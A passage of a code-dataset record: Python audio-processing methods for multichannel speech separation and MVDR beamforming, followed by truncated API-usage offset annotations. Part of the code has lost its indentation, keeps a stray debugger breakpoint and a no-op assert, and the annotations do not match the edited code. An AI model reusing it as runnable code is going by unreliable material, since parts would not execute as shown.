Apply MVDR Beamforming
"""
if self.functionMode == 'Enhance_Load_MVDR_Output' or self.functionMode == 'Enhance_Load_MISO1_MVDR_Output':
BeamformSaveDir = str(self.pickle_dir[index]).replace('CleanMix','Beamforming')
Beamform_stft = [[] for _ in range(self.num_spks)]
# Load MISO1 Output
for spk_idx in range(self.num_spks):
spk_name = '_s{}.wav'.format(spk_idx+1)
Beamform_sig, fs = librosa.load(BeamformSaveDir.replace('.pickle',spk_name), mono= False, sr= 8000)
if len(Beamform_sig.shape) == 1:
Beamform_sig = np.expand_dims(Beamform_sig, axis=1)
assert fs == self.fs, 'Check sampling rate'
Beamform_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(Beamform_sig)),[0,2,1])
Beamform_stft[spk_idx] = Beamform_stft[spk_idx]/self.scale
else:
Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
if self.dereverb_flag :
observe = torch.permute(dereverb_stft[spk_idx],[0,3,1,2])
else:
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu()
Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
#################################
########### Testcode ###########
#################################
DNN_WPE_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(DNN_WPE_dereverb_stft[spk_idx],[0,3,1,2])
DNN_WPE_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
FCP_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(FCP_dereverb_stft[spk_idx],[0,3,1,2])
FCP_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
Origin_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2])
Origin_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
#################################
########### Testcode ###########
#################################
if len(mix_stft.shape)== 4:
mix_stft = torch.squeeze(mix_stft)
for spk_idx in range(self.num_spks):
if len(MISO1_stft[spk_idx].shape)== 4:
MISO1_stft[spk_idx] = torch.squeeze(MISO1_stft[spk_idx])
if len(dereverb_stft[spk_idx].shape)==4:
dereverb_stft[spk_idx] = torch.squeeze(dereverb_stft[spk_idx])
if self.check_audio:
''' Check the result of MISO1 '''
self.save_audio(np.transpose(mix_stft, [0,2,1]), 'mix')
for spk_idx in range(self.num_spks):
self.save_audio(np.transpose(ref_stft_1ch[spk_idx], [0,2,1]), 'ref_s{}'.format(spk_idx))
self.save_audio(np.transpose(MISO1_stft[spk_idx], [0,2,1]), 'MISO1_s{}'.format(spk_idx))
if self.dereverb_flag:
self.save_audio(np.transpose(dereverb_stft[spk_idx], [0,2,1]), self.predictionType+'_s{}'.format(spk_idx))
self.save_audio(np.transpose(Beamform_stft[spk_idx], [0,2,1]), self.predictionType+'_Beamform_s{}'.format(spk_idx))
else:
self.save_audio(np.transpose(Beamform_stft[spk_idx], [0,2,1]), 'Beamform_s{}'.format(spk_idx))
#################################
########### Testcode ###########
#################################
#WPE
self.save_audio(np.transpose(np.squeeze(DNN_WPE_dereverb_stft[spk_idx],axis=0), [0,2,1]), 'DNN_WPE_s{}'.format(spk_idx))
self.save_audio(np.transpose(DNN_WPE_Beamform_stft[spk_idx], [0,2,1]), 'DNN_WPE_Beamform_s{}'.format(spk_idx))
#FCP
self.save_audio(np.transpose(np.squeeze(FCP_dereverb_stft[spk_idx],axis=0), [0,2,1]), 'FCP_s{}'.format(spk_idx))
self.save_audio(np.transpose(FCP_Beamform_stft[spk_idx], [0,2,1]), 'FCP_Beamform_s{}'.format(spk_idx))
#Origin Beamforming
self.save_audio(np.transpose(Origin_Beamform_stft[spk_idx], [0,2,1]), 'Origin_Beamform_s{}'.format(spk_idx))
#################################
########### Testcode ###########
#################################
pdb.set_trace()
return mix_stft, ref_stft_1ch, MISO1_stft, Beamform_stft
else:
assert -1, '[Error] Choose correct train mode'
def save_audio(self,signal, wavname):
        """
        Reconstruct a time-domain waveform from an STFT and write it to disk.

        Input:
            signal : complex STFT, size [Ch, F, T]
            wavname : str, output file name (".wav" is appended)
        """
        # Compensate the analysis-window gain before the inverse transform.
        analysis_win = scipy.signal.get_window(self.window, self.nperseg)
        gain = np.sqrt(1.0 / analysis_win.sum() ** 2)
        waveform = self.ISTFT(signal * gain)
        # Rescale to the int16 range before writing.
        waveform = (waveform * np.iinfo(np.int16).max).astype(np.int16)
        sf.write('{}.wav'.format(wavname), waveform.T, self.fs, 'PCM_24')
def ISTFT(self,FT_sig):
        '''
        Inverse STFT using the analysis parameters stored on the instance.

        input : FT_sig, complex spectrogram [F,T] (or a stack thereof)
        output : reconstructed time-domain signal (scipy.signal.istft layout)
        '''
        _, reconstructed = signal.istft(FT_sig, fs=self.fs, window=self.window, nperseg=self.nperseg, noverlap=self.noverlap)
        return reconstructed
def MISO1_Inference(self,mix_stft,ref_ch=0):
"""
Input:
mix_stft : observe STFT, size - [B, Mic, T, F]
Output:
MISO1_stft : list of separated source, - [B, reference Mic, T, F]
1. circular shift the microphone array at run time for the prediction of each microphone signal
If the microphones are arranged uniformly on a circle, Select the reference microphone by circular shifting the microphone. e.g reference mic q -> [Yq, Yq+1, ..., Yp, Y1, ..., Yq-1]
2. Using Permutation Invariance Alignmnet method to match between clean target signal and estimated signal
"""
B, M, T, F = mix_stft.size()
MISO1_stft = [torch.empty(B,M,T,F, dtype=torch.complex64) for _ in range(self.num_spks)]
Mic_array = [x for x in range(M)]
Mic_array = np.roll(Mic_array, -ref_ch) # [ref_ch, ref_ch+1, ..., 0, 1, ..., ref_ch-1]
# print('Mic_array : ', Mic_array)
with torch.no_grad():
mix_stft_refCh = torch.roll(mix_stft,-ref_ch, dims=1)
MISO1_refCh = self.model(mix_stft_refCh)
for spk_idx in range(self.num_spks):
MISO1_stft[spk_idx][:,ref_ch,...] = MISO1_refCh[:,spk_idx,...]
# MISO1_spk1[:,ref_ch,...] = MISO1_refCh[:,0,...]
# MISO1_spk2[:,ref_ch,...] = MISO1_refCh[:,1,...]
s_MISO1_refCh = torch.unsqueeze(MISO1_refCh, dim=2)
s_Magnitude_refCh = torch.abs(torch.sqrt(s_MISO1_refCh.real**2 + s_MISO1_refCh.imag**2)) # [B,Spks,1,T,F]
with torch.no_grad():
for shiftIdx in Mic_array[1:]:
# print('shift Micnumber', shiftIdx)
mix_stft_shift = torch.roll(mix_stft,-shiftIdx, dims=1)
MISO1_chShift = self.model(mix_stft_shift)
s_MISO1_chShift = torch.unsqueeze(MISO1_chShift, dim=1) #[B,1,Spks,T,F]
s_magnitude_chShift = torch.sum(torch.abs(s_Magnitude_refCh - abs(s_MISO1_chShift)),[3,4]) #[B,Spks,Spks,T,F]
perms = MISO1_chShift.new_tensor(list(permutations(range(self.num_spks))), dtype=torch.long)
index_ = torch.unsqueeze(perms, dim=2)
perms_one_hot = MISO1_chShift.new_zeros((*perms.size(), self.num_spks), dtype=torch.float).scatter_(2,index_,1)
batchwise_distance = torch.einsum('bij,pij->bp', [s_magnitude_chShift, perms_one_hot])
min_distance_idx = torch.argmin(batchwise_distance,dim=1)
for batch_idx in range(B):
align_index = torch.argmax(perms_one_hot[min_distance_idx[batch_idx]],dim=1)
for spk_idx in range(self.num_spks):
target_index = align_index[spk_idx]
MISO1_stft[spk_idx][:,shiftIdx,...] = MISO1_chShift[batch_idx,target_index,...]
return MISO1_stft
def Apply_Beamforming(self, source_stft, mix_stft, epsi=1e-6):
        """
        MVDR beamforming driven by an estimated source STFT.

        Input :
            source_stft : estimated source STFT, size - [B, F, Ch, T], np.ndarray
            mix_stft : observed mixture STFT, size - [B, F, Ch, T], np.ndarray
            epsi : diagonal-loading factor for matrix-inversion stability
        Output :
            source_bf : beamformed source, torch.Tensor of size [B, T, F]

        1. estimate the target steering vector via eigen-decomposition of the
           source spatial covariance matrix (SCM)
        2. build source / noise SCMs, S = 1/T * x x^H
        3. apply the MVDR beamformer
        """
        B, F, M, T = source_stft.shape
        # Small diagonal loading to keep the noise SCM invertible.
        eye = np.eye(M)
        eye = eye.reshape(1, 1, M, M)
        delta = epsi * np.tile(eye, [B, F, 1, 1])
        ''' Source '''
        source_SCM = self.get_spatial_covariance_matrix(source_stft, normalize=True)  # [B,F,C,C]
        # Enforce Hermitian symmetry (numerical noise can break it).
        source_SCM = 0.5 * (source_SCM + np.conj(source_SCM.swapaxes(-1, -2)))
        ''' Noise Spatial Covariance '''
        noise_signal = mix_stft - source_stft
        noise_SCM = self.get_spatial_covariance_matrix(noise_signal, normalize=True)  # [B,F,C,C]
        noise_SCM = 0.5 * (noise_SCM + np.conj(noise_SCM.swapaxes(-1, -2)))
        ''' Get Steering vector : Eigen-decomposition '''
        shape = source_SCM.shape
        source_SCM = np.reshape(source_SCM, (-1,) + shape[-2:])
        eigenvals, eigenvecs = np.linalg.eigh(source_SCM)
        # eigh returns ascending eigenvalues; pick the principal eigenvector.
        vals = np.argmax(eigenvals, axis=-1)
        # FIX: removed the dead `np.empty(..., dtype=np.complex)` pre-allocation;
        # it was immediately overwritten and `np.complex` was removed in
        # NumPy >= 1.24, so it crashed on modern NumPy.
        source_steering = np.array([eigenvecs[i, :, vals[i]] for i in range(eigenvals.shape[0])])
        source_steering = np.reshape(source_steering, shape[:-1])  # [B,F,Ch]
        source_SCM = np.reshape(source_SCM, shape)
        ''' steering normalize with respect to the reference microphone '''
        source_steering = source_steering / np.expand_dims(source_steering[:, :, 0], axis=2)
        for b_idx in range(0, B):
            for f_idx in range(0, F):
                # Rescale each steering vector to norm sqrt(M).
                source_steering[b_idx, f_idx, :] = source_steering[b_idx, f_idx, :] * np.sqrt(M / (np.linalg.norm(source_steering[b_idx, f_idx, :])))
        source_steering = self.PhaseCorrection(source_steering)
        beamformer = self.get_mvdr_beamformer(source_steering, noise_SCM, delta)
        source_bf = self.apply_beamformer(beamformer, mix_stft)
        # [B,F,T] -> [B,T,F], as a torch tensor for downstream processing.
        source_bf = torch.permute(torch.from_numpy(source_bf), [0, 2, 1])
        return source_bf
def get_spatial_covariance_matrix(self,observation,normalize):
        '''
        Spatial covariance matrix R = sum_t x(t) x(t)^H (optionally time-averaged).

        Input :
            observation : complex STFT, size [B,F,C,T]
            normalize : if True, divide by the number of frames T
        Return :
            R : size [B,F,C,C]
        '''
        B, F, C, T = observation.shape
        R = np.einsum('...dt,...et-> ...de', observation, observation.conj())
        if normalize:
            # PERF FIX: dividing by the frame count directly is equivalent to
            # (and far cheaper than) allocating a [B,F,1,T] array of ones and
            # summing it over time, as the original did.
            R /= T
        return R
def PhaseCorrection(self,W):  # same behaviour as the Matlab implementation
        """
        Phase correction to reduce distortions due to phase inconsistencies.

        Works on a copy; the input array is left untouched.

        Input:
            W : steering vector, size [B,F,Ch]
        Return:
            phase-aligned copy of W, same shape
        """
        corrected = W.copy()
        num_batch, num_freq, _ = corrected.shape
        for b in range(0, num_batch):
            # Sequentially rotate each frequency bin so it is phase-aligned with
            # the (already corrected) previous bin.
            for f in range(1, num_freq):
                projection = np.sum(corrected[b, f, :] * corrected[b, f - 1, :].conj(), axis=-1, keepdims=True)
                corrected[b, f, :] *= np.exp(-1j * np.angle(projection))
        return corrected
def condition_covariance(self,x,gamma):
        """Diagonal loading of covariance matrices (in place).

        See https://stt.msu.edu/users/mauryaas/Ashwini_JPEN.pdf (2.3).
        Mutates `x` and also returns it.
        """
        num_batch, _, _, _ = x.shape
        for b in range(0, num_batch):
            # gamma times the mean diagonal energy sets the loading strength.
            load = gamma * np.trace(x[b, ...]) / x[b, ...].shape[-1]
            loaded_eye = np.eye(x.shape[-1]) * load
            x[b, ...] = (x[b, ...] + loaded_eye) / (1 + gamma)
        return x
def normalize(self,vector):
        """Normalise each [b, f] steering vector by its squared L2 norm (in place)."""
        num_batch, num_freq, _ = vector.shape
        for b in range(0, num_batch):
            for f in range(0, num_freq):
                # v^H v gives the (real-valued) energy of this bin's vector.
                energy = np.matmul(np.conjugate(vector[b, f, :]).reshape(1, -1), vector[b, f, :])
                vector[b, f, :] = vector[b, f, :] / energy
        return vector
def blind_analytic_normalization(self,vector, noise_psd_matrix, eps=0):
        """Reduces distortions in beamformed output (blind analytic normalization).

        :param vector: beamforming vector, shape (..., sensors)
        :param noise_psd_matrix: shape (..., sensors, sensors)
        :return: scaled beamforming vector, shape (..., sensors)
        """
        # |sqrt(w^H N N w)| - numerator of the BAN gain.
        quad = np.einsum(
            '...a,...ab,...bc,...c->...',
            vector.conj(), noise_psd_matrix, noise_psd_matrix, vector
        )
        numerator = np.abs(np.sqrt(quad))
        # |w^H N w| - denominator of the BAN gain.
        denominator = np.abs(np.einsum(
            '...a,...ab,...b->...', vector.conj(), noise_psd_matrix, vector
        ))
        gain = numerator / (denominator + eps)
        return vector * gain[..., np.newaxis]
def get_mvdr_beamformer(self, steering_vector, R_noise, delta):
        """
        Returns the MVDR beamforming vector w = R_n^{-1} d / (d^H R_n^{-1} d).

        Input :
            steering_vector : acoustic transfer function, shape [B, F, Ch]
            R_noise : noise spatial covariance matrix, shape [B, F, Ch, Ch]
            delta : diagonal loading, added to R_noise for numerical stability
        """
        # NOTE: += mutates the caller's R_noise, matching the original contract.
        R_noise += delta
        numerator = solve(R_noise, steering_vector)
        denominator = np.einsum('...d,...d->...', steering_vector.conj(), numerator)
        return numerator / np.expand_dims(denominator, axis=-1)
def apply_beamformer(self, beamformer, mixture):
        """Apply beamformer weights to the mixture: y(t) = w^H x(t).

        beamformer : shape (..., Ch); mixture : shape (..., Ch, T); returns (..., T).
        """
        weights = np.conjugate(beamformer)
        return np.einsum('...a,...at->...t', weights, mixture)
def __len__(self):
        # Dataset length: one item per entry in `self.pickle_dir`
        # (presumably a list of pickle file paths - confirm against __init__).
        return len(self.pickle_dir)
| [
"numpy.trace",
"numpy.sqrt",
"torch.sqrt",
"numpy.iinfo",
"torch.from_numpy",
"convolutive_prediction.Apply_ConvolutivePrediction",
"torch.squeeze",
"numpy.linalg.norm",
"scipy.signal.get_window",
"numpy.reshape",
"pathlib.Path",
"torch.unsqueeze",
"numpy.conjugate",
"numpy.empty",
"torc... | [((1067, 1112), 'scipy.signal.get_window', 'scipy.signal.get_window', (['"""hann"""', 'self.nperseg'], {}), "('hann', self.nperseg)\n", (1090, 1112), False, 'import scipy\n'), ((17637, 17687), 'scipy.signal.get_window', 'scipy.signal.get_window', (['self.window', 'self.nperseg'], {}), '(self.window, self.nperseg)\n', (17660, 17687), False, 'import scipy\n'), ((18248, 18350), 'scipy.signal.istft', 'signal.istft', (['FT_sig'], {'fs': 'self.fs', 'window': 'self.window', 'nperseg': 'self.nperseg', 'noverlap': 'self.noverlap'}), '(FT_sig, fs=self.fs, window=self.window, nperseg=self.nperseg,\n noverlap=self.noverlap)\n', (18260, 18350), False, 'from scipy import signal\n'), ((19264, 19291), 'numpy.roll', 'np.roll', (['Mic_array', '(-ref_ch)'], {}), '(Mic_array, -ref_ch)\n', (19271, 19291), True, 'import numpy as np\n'), ((19808, 19843), 'torch.unsqueeze', 'torch.unsqueeze', (['MISO1_refCh'], {'dim': '(2)'}), '(MISO1_refCh, dim=2)\n', (19823, 19843), False, 'import torch\n'), ((22043, 22052), 'numpy.eye', 'np.eye', (['M'], {}), '(M)\n', (22049, 22052), True, 'import numpy as np\n'), ((23026, 23064), 'numpy.empty', 'np.empty', (['shape[:-1]'], {'dtype': 'np.complex'}), '(shape[:-1], dtype=np.complex)\n', (23034, 23064), True, 'import numpy as np\n'), ((23114, 23156), 'numpy.reshape', 'np.reshape', (['source_SCM', '((-1,) + shape[-2:])'], {}), '(source_SCM, (-1,) + shape[-2:])\n', (23124, 23156), True, 'import numpy as np\n'), ((23189, 23215), 'numpy.linalg.eigh', 'np.linalg.eigh', (['source_SCM'], {}), '(source_SCM)\n', (23203, 23215), True, 'import numpy as np\n'), ((23260, 23289), 'numpy.argmax', 'np.argmax', (['eigenvals'], {'axis': '(-1)'}), '(eigenvals, axis=-1)\n', (23269, 23289), True, 'import numpy as np\n'), ((23617, 23656), 'numpy.reshape', 'np.reshape', (['source_steering', 'shape[:-1]'], {}), '(source_steering, shape[:-1])\n', (23627, 23656), True, 'import numpy as np\n'), ((23689, 23718), 'numpy.reshape', 'np.reshape', (['source_SCM', 'shape'], 
{}), '(source_SCM, shape)\n', (23699, 23718), True, 'import numpy as np\n'), ((27234, 27253), 'numpy.abs', 'np.abs', (['denominator'], {}), '(denominator)\n', (27240, 27253), True, 'import numpy as np\n'), ((27794, 27825), 'numpy.linalg.solve', 'solve', (['R_noise', 'steering_vector'], {}), '(R_noise, steering_vector)\n', (27799, 27825), False, 'from numpy.linalg import solve\n'), ((2118, 2233), 'scipy.signal.stft', 'signal.stft', (['time_sig[:, num_ch]'], {'fs': 'self.fs', 'window': 'self.window', 'nperseg': 'self.nperseg', 'noverlap': 'self.noverlap'}), '(time_sig[:, num_ch], fs=self.fs, window=self.window, nperseg=\n self.nperseg, noverlap=self.noverlap)\n', (2129, 2233), False, 'from scipy import signal\n'), ((2275, 2306), 'numpy.expand_dims', 'np.expand_dims', (['stft_ch'], {'axis': '(0)'}), '(stft_ch, axis=0)\n', (2289, 2306), True, 'import numpy as np\n'), ((2617, 2631), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (2628, 2631), False, 'import pickle\n'), ((3824, 3850), 'torch.from_numpy', 'torch.from_numpy', (['mix_stft'], {}), '(mix_stft)\n', (3840, 3850), False, 'import torch\n'), ((17757, 17775), 'numpy.iinfo', 'np.iinfo', (['np.int16'], {}), '(np.int16)\n', (17765, 17775), True, 'import numpy as np\n'), ((19118, 19164), 'torch.empty', 'torch.empty', (['B', 'M', 'T', 'F'], {'dtype': 'torch.complex64'}), '(B, M, T, F, dtype=torch.complex64)\n', (19129, 19164), False, 'import torch\n'), ((19397, 19412), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (19410, 19412), False, 'import torch\n'), ((19443, 19480), 'torch.roll', 'torch.roll', (['mix_stft', '(-ref_ch)'], {'dims': '(1)'}), '(mix_stft, -ref_ch, dims=1)\n', (19453, 19480), False, 'import torch\n'), ((19882, 19943), 'torch.sqrt', 'torch.sqrt', (['(s_MISO1_refCh.real ** 2 + s_MISO1_refCh.imag ** 2)'], {}), '(s_MISO1_refCh.real ** 2 + s_MISO1_refCh.imag ** 2)\n', (19892, 19943), False, 'import torch\n'), ((19980, 19995), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (19993, 19995), 
False, 'import torch\n'), ((22111, 22137), 'numpy.tile', 'np.tile', (['eye', '[B, F, 1, 1]'], {}), '(eye, [B, F, 1, 1])\n', (22118, 22137), True, 'import numpy as np\n'), ((23865, 23913), 'numpy.expand_dims', 'np.expand_dims', (['source_steering[:, :, 0]'], {'axis': '(2)'}), '(source_steering[:, :, 0], axis=2)\n', (23879, 23913), True, 'import numpy as np\n'), ((24630, 24657), 'torch.from_numpy', 'torch.from_numpy', (['source_bf'], {}), '(source_bf)\n', (24646, 24657), False, 'import torch\n'), ((27072, 27090), 'numpy.sqrt', 'np.sqrt', (['nominator'], {}), '(nominator)\n', (27079, 27090), True, 'import numpy as np\n'), ((27930, 27960), 'numpy.expand_dims', 'np.expand_dims', (['denom'], {'axis': '(-1)'}), '(denom, axis=-1)\n', (27944, 27960), True, 'import numpy as np\n'), ((2418, 2456), 'numpy.append', 'np.append', (['stft_chcat', 'stft_ch'], {'axis': '(0)'}), '(stft_chcat, stft_ch, axis=0)\n', (2427, 2456), True, 'import numpy as np\n'), ((3492, 3523), 'numpy.expand_dims', 'np.expand_dims', (['ref_sig'], {'axis': '(1)'}), '(ref_sig, axis=1)\n', (3506, 3523), True, 'import numpy as np\n'), ((4092, 4134), 'torch.roll', 'torch.roll', (['mix_stft', '(-self.ref_ch)'], {'dims': '(0)'}), '(mix_stft, -self.ref_ch, dims=0)\n', (4102, 4134), False, 'import torch\n'), ((4134, 4176), 'torch.roll', 'torch.roll', (['ref_stft', '(-self.ref_ch)'], {'dims': '(0)'}), '(ref_stft, -self.ref_ch, dims=0)\n', (4144, 4176), False, 'import torch\n'), ((20143, 20182), 'torch.roll', 'torch.roll', (['mix_stft', '(-shiftIdx)'], {'dims': '(1)'}), '(mix_stft, -shiftIdx, dims=1)\n', (20153, 20182), False, 'import torch\n'), ((20276, 20313), 'torch.unsqueeze', 'torch.unsqueeze', (['MISO1_chShift'], {'dim': '(1)'}), '(MISO1_chShift, dim=1)\n', (20291, 20313), False, 'import torch\n'), ((20590, 20619), 'torch.unsqueeze', 'torch.unsqueeze', (['perms'], {'dim': '(2)'}), '(perms, dim=2)\n', (20605, 20619), False, 'import torch\n'), ((20785, 20850), 'torch.einsum', 'torch.einsum', 
(['"""bij,pij->bp"""', '[s_magnitude_chShift, perms_one_hot]'], {}), "('bij,pij->bp', [s_magnitude_chShift, perms_one_hot])\n", (20797, 20850), False, 'import torch\n'), ((20886, 20925), 'torch.argmin', 'torch.argmin', (['batchwise_distance'], {'dim': '(1)'}), '(batchwise_distance, dim=1)\n', (20898, 20925), False, 'import torch\n'), ((25157, 25178), 'numpy.ones', 'np.ones', (['(B, F, 1, T)'], {}), '((B, F, 1, T))\n', (25164, 25178), True, 'import numpy as np\n'), ((26050, 26069), 'numpy.eye', 'np.eye', (['x.shape[-1]'], {}), '(x.shape[-1])\n', (26056, 26069), True, 'import numpy as np\n'), ((1001, 1017), 'pathlib.Path', 'Path', (['pickle_dir'], {}), '(pickle_dir)\n', (1005, 1017), False, 'from pathlib import Path\n'), ((7817, 7848), 'torch.unsqueeze', 'torch.unsqueeze', (['s_MISO1'], {'dim': '(2)'}), '(s_MISO1, dim=2)\n', (7832, 7848), False, 'import torch\n'), ((8002, 8030), 'torch.unsqueeze', 'torch.unsqueeze', (['ref_'], {'dim': '(1)'}), '(ref_, dim=1)\n', (8017, 8030), False, 'import torch\n'), ((8253, 8282), 'torch.unsqueeze', 'torch.unsqueeze', (['perms'], {'dim': '(2)'}), '(perms, dim=2)\n', (8268, 8282), False, 'import torch\n'), ((8431, 8495), 'torch.einsum', 'torch.einsum', (['"""bij,pij->bp"""', '[magnitude_distance, perms_one_hot]'], {}), "('bij,pij->bp', [magnitude_distance, perms_one_hot])\n", (8443, 8495), False, 'import torch\n'), ((8526, 8565), 'torch.argmin', 'torch.argmin', (['batchwise_distance'], {'dim': '(1)'}), '(batchwise_distance, dim=1)\n', (8538, 8565), False, 'import torch\n'), ((21033, 21096), 'torch.argmax', 'torch.argmax', (['perms_one_hot[min_distance_idx[batch_idx]]'], {'dim': '(1)'}), '(perms_one_hot[min_distance_idx[batch_idx]], dim=1)\n', (21045, 21096), False, 'import torch\n'), ((25977, 26000), 'numpy.trace', 'np.trace', (['x[b_idx, ...]'], {}), '(x[b_idx, ...])\n', (25985, 26000), True, 'import numpy as np\n'), ((4978, 5010), 'torch.unsqueeze', 'torch.unsqueeze', (['mix_stft'], {'dim': '(0)'}), '(mix_stft, dim=0)\n', (4993, 
5010), False, 'import torch\n'), ((5499, 5544), 'torch.unsqueeze', 'torch.unsqueeze', (['ref_stft_1ch[spk_idx]'], {'dim': '(1)'}), '(ref_stft_1ch[spk_idx], dim=1)\n', (5514, 5544), False, 'import torch\n'), ((7904, 7955), 'torch.sqrt', 'torch.sqrt', (['(s_MISO1_.real ** 2 + s_MISO1_.imag ** 2)'], {}), '(s_MISO1_.real ** 2 + s_MISO1_.imag ** 2)\n', (7914, 7955), False, 'import torch\n'), ((8636, 8699), 'torch.argmax', 'torch.argmax', (['perms_one_hot[min_distance_idx[batch_idx]]'], {'dim': '(1)'}), '(perms_one_hot[min_distance_idx[batch_idx]], dim=1)\n', (8648, 8699), False, 'import torch\n'), ((14926, 14949), 'torch.squeeze', 'torch.squeeze', (['mix_stft'], {}), '(mix_stft)\n', (14939, 14949), False, 'import torch\n'), ((17244, 17259), 'pdb.set_trace', 'pdb.set_trace', ([], {}), '()\n', (17257, 17259), False, 'import pdb\n'), ((5298, 5339), 'torch.unsqueeze', 'torch.unsqueeze', (['ref_stft[spk_idx]'], {'dim': '(0)'}), '(ref_stft[spk_idx], dim=0)\n', (5313, 5339), False, 'import torch\n'), ((7656, 7703), 'torch.cat', 'torch.cat', (['(ref_, ref_stft_1ch[spk_idx])'], {'dim': '(1)'}), '((ref_, ref_stft_1ch[spk_idx]), dim=1)\n', (7665, 7703), False, 'import torch\n'), ((7733, 7795), 'torch.stack', 'torch.stack', (['(s_MISO1, MISO1_stft[spk_idx][:, 0, :, :])'], {'dim': '(1)'}), '((s_MISO1, MISO1_stft[spk_idx][:, 0, :, :]), dim=1)\n', (7744, 7795), False, 'import torch\n'), ((8853, 8911), 'torch.unsqueeze', 'torch.unsqueeze', (['ref_[batch_idx, target_index, ...]'], {'dim': '(0)'}), '(ref_[batch_idx, target_index, ...], dim=0)\n', (8868, 8911), False, 'import torch\n'), ((9641, 9784), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', 'self.predictionType', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), '(observe, source, self.num_spks, self.\n predictionType, self.tapDelay, self.nTap, self.reverb_variance_flowValue)\n', (9668, 9784), False, 'from convolutive_prediction import 
Apply_ConvolutivePrediction\n'), ((11162, 11295), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', '"""DNN_WPE"""', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), "(observe, source, self.num_spks, 'DNN_WPE', self\n .tapDelay, self.nTap, self.reverb_variance_flowValue)\n", (11189, 11295), False, 'from convolutive_prediction import Apply_ConvolutivePrediction\n'), ((11562, 11691), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', '"""FCP"""', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), "(observe, source, self.num_spks, 'FCP', self.\n tapDelay, self.nTap, self.reverb_variance_flowValue)\n", (11589, 11691), False, 'from convolutive_prediction import Apply_ConvolutivePrediction\n'), ((13797, 13856), 'torch.permute', 'torch.permute', (['DNN_WPE_dereverb_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(DNN_WPE_dereverb_stft[spk_idx], [0, 3, 1, 2])\n', (13810, 13856), False, 'import torch\n'), ((14183, 14238), 'torch.permute', 'torch.permute', (['FCP_dereverb_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(FCP_dereverb_stft[spk_idx], [0, 3, 1, 2])\n', (14196, 14238), False, 'import torch\n'), ((14581, 14618), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (14594, 14618), False, 'import torch\n'), ((15096, 15130), 'torch.squeeze', 'torch.squeeze', (['MISO1_stft[spk_idx]'], {}), '(MISO1_stft[spk_idx])\n', (15109, 15130), False, 'import torch\n'), ((15233, 15270), 'torch.squeeze', 'torch.squeeze', (['dereverb_stft[spk_idx]'], {}), '(dereverb_stft[spk_idx])\n', (15246, 15270), False, 'import torch\n'), ((15387, 15420), 'numpy.transpose', 'np.transpose', (['mix_stft', '[0, 2, 1]'], {}), '(mix_stft, [0, 2, 1])\n', (15399, 15420), True, 'import numpy as np\n'), ((24178, 24226), 'numpy.linalg.norm', 'np.linalg.norm', (['source_steering[b_idx, f_idx, 
:]'], {}), '(source_steering[b_idx, f_idx, :])\n', (24192, 24226), True, 'import numpy as np\n'), ((26332, 26366), 'numpy.conjugate', 'np.conjugate', (['vector[b_idx, ii, :]'], {}), '(vector[b_idx, ii, :])\n', (26344, 26366), True, 'import numpy as np\n'), ((6502, 6535), 'numpy.expand_dims', 'np.expand_dims', (['MISO1_sig'], {'axis': '(1)'}), '(MISO1_sig, axis=1)\n', (6516, 6535), True, 'import numpy as np\n'), ((9982, 10125), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', 'self.predictionType', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), '(observe, source, self.num_spks, self.\n predictionType, self.tapDelay, self.nTap, self.reverb_variance_flowValue)\n', (10009, 10125), False, 'from convolutive_prediction import Apply_ConvolutivePrediction\n'), ((12548, 12584), 'numpy.expand_dims', 'np.expand_dims', (['Beamform_sig'], {'axis': '(1)'}), '(Beamform_sig, axis=1)\n', (12562, 12584), True, 'import numpy as np\n'), ((13149, 13200), 'torch.permute', 'torch.permute', (['dereverb_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(dereverb_stft[spk_idx], [0, 3, 1, 2])\n', (13162, 13200), False, 'import torch\n'), ((15516, 15562), 'numpy.transpose', 'np.transpose', (['ref_stft_1ch[spk_idx]', '[0, 2, 1]'], {}), '(ref_stft_1ch[spk_idx], [0, 2, 1])\n', (15528, 15562), True, 'import numpy as np\n'), ((15625, 15669), 'numpy.transpose', 'np.transpose', (['MISO1_stft[spk_idx]', '[0, 2, 1]'], {}), '(MISO1_stft[spk_idx], [0, 2, 1])\n', (15637, 15669), True, 'import numpy as np\n'), ((16521, 16576), 'numpy.transpose', 'np.transpose', (['DNN_WPE_Beamform_stft[spk_idx]', '[0, 2, 1]'], {}), '(DNN_WPE_Beamform_stft[spk_idx], [0, 2, 1])\n', (16533, 16576), True, 'import numpy as np\n'), ((16810, 16861), 